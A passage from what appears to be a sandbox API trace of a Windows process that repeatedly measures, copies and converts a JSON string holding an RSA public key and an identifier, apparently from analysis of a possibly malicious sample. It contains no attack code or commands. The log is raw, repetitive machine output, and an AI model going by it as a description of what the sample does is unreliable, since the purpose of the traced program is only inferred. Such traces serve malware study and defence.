KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.469] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.470] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.470] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3219368 | out: hHeap=0x620000) returned 1 [0123.470] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 545 [0123.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x444) returned 0x3218938 [0123.470] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xfc0a778, cbMultiByte=-1, lpWideCharStr=0x3218938, cchWideChar=546 | out: lpWideCharStr="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned 546 [0123.470] lstrcpyW (in: lpString1=0x51a7c0, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuS\\/uEwpTF9K5knH4GbCD\\\\nNaStMcirWtNLwc1IbSIfYXbwfli6D44yIspAZMar+wotlh6KKYWNifwh8kHWr84b\\\\nOfqYirep9DvZMmAwGFTmgG2GwOV8hFJSpXGzlzY15D4jRTtuxZBiox7p+8nNHShm\\\\n1w1Mx1fsqICoKte18dzQ3C714H\\/WmGGmwVNp\\/56V2CYVFMB4JsRnUzxYEBLWly6Q\\\\n65F4PyfqcY3af5ibMbUVeE6AOTnpoqo12nXcY\\/X9zd07tctrIXIm+2ABmtxWckAz\\\\nkKDXfdWboqP\\/isn1NFKVmh7NfyWvZhb7+w28\\/xr+G1udzTk6xWXT2lrbwLp7MxyK\\\\nqwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR\"}" [0123.470] lstrlenW (lpString="-----BEGIN PUBLIC 